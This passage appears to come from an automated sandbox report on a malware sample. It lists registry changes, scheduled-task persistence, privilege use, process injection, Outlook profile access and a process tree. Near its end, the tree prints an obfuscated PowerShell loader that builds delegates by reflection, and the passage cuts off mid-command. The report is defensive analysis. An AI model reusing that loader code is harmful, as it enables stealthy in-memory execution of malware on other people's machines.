Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" firefox.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 firefox.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff firefox.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags firefox.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" firefox.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ New Text Document mod.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" firefox.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 firefox.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg firefox.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff firefox.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" firefox.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" firefox.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 firefox.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" firefox.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" firefox.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" firefox.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" firefox.exe -
Modifies registry key 1 TTPs 4 IoCs
pid Process 9840 reg.exe 11112 reg.exe 9620 reg.exe 10312 reg.exe -
Runs ping.exe 1 TTPs 7 IoCs
pid Process 2748 PING.EXE 8392 PING.EXE 6600 PING.EXE 4616 PING.EXE 1224 PING.EXE 5756 PING.EXE 4788 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 19 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 10748 schtasks.exe 6096 schtasks.exe 7740 schtasks.exe 8692 schtasks.exe 8164 schtasks.exe 7648 schtasks.exe 3292 schtasks.exe 5420 schtasks.exe 8236 schtasks.exe 2680 schtasks.exe 11224 schtasks.exe 2732 schtasks.exe 10076 SCHTASKS.exe 10716 schtasks.exe 8092 schtasks.exe 10576 schtasks.exe 10044 schtasks.exe 10184 schtasks.exe 10644 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5332 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5204 build.exe 5628 gem1.exe 5628 gem1.exe 5448 gem2.exe 2732 powershell.exe 2732 powershell.exe 2732 powershell.exe 5448 gem2.exe 5448 gem2.exe 5448 gem2.exe 5448 gem2.exe 5448 gem2.exe 5448 gem2.exe 5448 gem2.exe 5448 gem2.exe 5448 gem2.exe 5448 gem2.exe 5448 gem2.exe 5448 gem2.exe 3828 dialer.exe 3828 dialer.exe 3828 dialer.exe 5448 gem2.exe 3828 dialer.exe 3828 dialer.exe 5448 gem2.exe 5448 gem2.exe 3828 dialer.exe 3828 dialer.exe 3804 Lightshot.exe 3828 dialer.exe 3828 dialer.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 3828 dialer.exe 3828 dialer.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4076 firefox.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 2876 7zFM.exe Token: 35 2876 7zFM.exe Token: SeSecurityPrivilege 2876 7zFM.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 2436 ._cache_New Text Document mod.exe Token: SeDebugPrivilege 5276 ._cache_Synaptics.exe Token: SeDebugPrivilege 2380 Synaptics.exe Token: SeDebugPrivilege 2380 Synaptics.exe Token: SeDebugPrivilege 2380 Synaptics.exe Token: SeDebugPrivilege 2380 Synaptics.exe Token: SeDebugPrivilege 2380 Synaptics.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 4076 firefox.exe Token: SeDebugPrivilege 5204 build.exe Token: SeDebugPrivilege 6080 ._cache_New Text Document mod.exe Token: SeDebugPrivilege 5244 firefox.exe Token: SeDebugPrivilege 5244 firefox.exe Token: SeDebugPrivilege 2888 voidware_loader.exe Token: SeDebugPrivilege 5244 firefox.exe Token: SeDebugPrivilege 5244 firefox.exe Token: SeDebugPrivilege 5244 firefox.exe Token: SeDebugPrivilege 5244 firefox.exe Token: SeDebugPrivilege 5244 firefox.exe Token: SeDebugPrivilege 5244 firefox.exe Token: SeDebugPrivilege 5244 firefox.exe Token: SeDebugPrivilege 5244 firefox.exe Token: SeDebugPrivilege 5244 firefox.exe Token: SeDebugPrivilege 5244 firefox.exe Token: SeDebugPrivilege 5244 firefox.exe Token: SeDebugPrivilege 5244 firefox.exe Token: SeDebugPrivilege 5244 firefox.exe Token: SeDebugPrivilege 5244 firefox.exe Token: SeDebugPrivilege 5244 firefox.exe Token: SeDebugPrivilege 4260 DirectX111.exe Token: SeDebugPrivilege 5628 gem1.exe Token: SeImpersonatePrivilege 5628 gem1.exe Token: SeDebugPrivilege 5244 firefox.exe Token: SeDebugPrivilege 5244 firefox.exe Token: SeDebugPrivilege 5244 firefox.exe Token: SeDebugPrivilege 5244 firefox.exe -
Suspicious use of FindShellTrayWindow 44 IoCs
pid Process 2876 7zFM.exe 2876 7zFM.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe -
Suspicious use of SendNotifyMessage 40 IoCs
pid Process 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe 5244 firefox.exe -
Suspicious use of SetWindowsHookEx 25 IoCs
pid Process 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 4076 firefox.exe 5332 EXCEL.EXE 5332 EXCEL.EXE 5332 EXCEL.EXE 5332 EXCEL.EXE 5332 EXCEL.EXE 5332 EXCEL.EXE 5332 EXCEL.EXE 5332 EXCEL.EXE 4076 firefox.exe 4076 firefox.exe 5244 firefox.exe 5244 firefox.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3372 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2220 wrote to memory of 4076 2220 firefox.exe 104 PID 2220 wrote to memory of 4076 2220 firefox.exe 104 PID 2220 wrote to memory of 4076 2220 firefox.exe 104 PID 2220 wrote to memory of 4076 2220 firefox.exe 104 PID 2220 wrote to memory of 4076 2220 firefox.exe 104 PID 2220 wrote to memory of 4076 2220 firefox.exe 104 PID 2220 wrote to memory of 4076 2220 firefox.exe 104 PID 2220 wrote to memory of 4076 2220 firefox.exe 104 PID 2220 wrote to memory of 4076 2220 firefox.exe 104 PID 2220 wrote to memory of 4076 2220 firefox.exe 104 PID 2220 wrote to memory of 4076 2220 firefox.exe 104 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 5056 4076 firefox.exe 105 PID 4076 wrote to memory of 4280 4076 firefox.exe 106 PID 4076 wrote to memory of 4280 4076 firefox.exe 106 PID 4076 wrote to memory of 4280 4076 firefox.exe 106 PID 4076 wrote to memory of 4280 4076 firefox.exe 106 PID 4076 wrote to memory of 4280 4076 firefox.exe 106 PID 4076 wrote to memory of 4280 4076 firefox.exe 106 PID 4076 wrote to memory of 4280 4076 firefox.exe 106 PID 4076 wrote to memory of 4280 4076 firefox.exe 106 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:388
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1152
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:8580
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:6756
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:3352
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:3528
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:8312
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:10188
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:8748
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:5084
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:964
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1032
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1124
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1180
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fyojPkmwTGyn{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TjwmJWsuYddpFv,[Parameter(Position=1)][Type]$uPUFZirxNF)$UEXIGDGvSgl=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'efl'+[Char](101)+'ct'+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+'l'+'e'+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+'M'+''+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+''+[Char](121)+'Modu'+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+'De'+'l'+''+[Char](101)+''+[Char](103)+'a'+'t'+''+[Char](101)+''+'T'+''+'y'+'p'+[Char](101)+'',''+'C'+'l'+[Char](97)+''+'s'+''+[Char](115)+''+','+'P'+[Char](117)+'b'+[Char](108)+''+'i'+'c'+','+''+[Char](83)+''+[Char](101)+'al'+[Char](101)+''+[Char](100)+',A'+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+'o'+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$UEXIGDGvSgl.DefineConstructor('R'+'T'+''+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+'i'+''+'a'+''+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$TjwmJWsuYddpFv).SetImplementationFlags(''+[Char](82)+'u'+'n'+'t'+'i'+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+''+[Char](97)+'g'+'e'+''+'d'+'');$UEXIGDGvSgl.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+'l'+'i'+''+[Char](99)+''+','+'H'+'i'+'d'+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'N'+'e'+'w'+'S'+'l'+''+'o'+''+[Char](116)+''+','+'V'+[Char](105)+''+[Char](114)+''+'t'+''+'u'+'a'+[Char](108)+'',$uPUFZirxNF,$TjwmJWsuYddpFv).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $UEXIGDGvSgl.CreateType();}$bGAdRZPEzEzpP=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+'.'+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+'t'+'i'+[Char](118)+'eMe'+'t'+'ho'+[Char](100)+''+[Char](115)+'');$SswDIYcTMvqjIl=$bGAdRZPEzEzpP.GetMethod('G'+[Char](101)+''+'t'+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c'+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$vGONupswNMwThwQvuKQ=fyojPkmwTGyn @([String])([IntPtr]);$FzOFmFGZKOhPxAGlYTriDQ=fyojPkmwTGyn 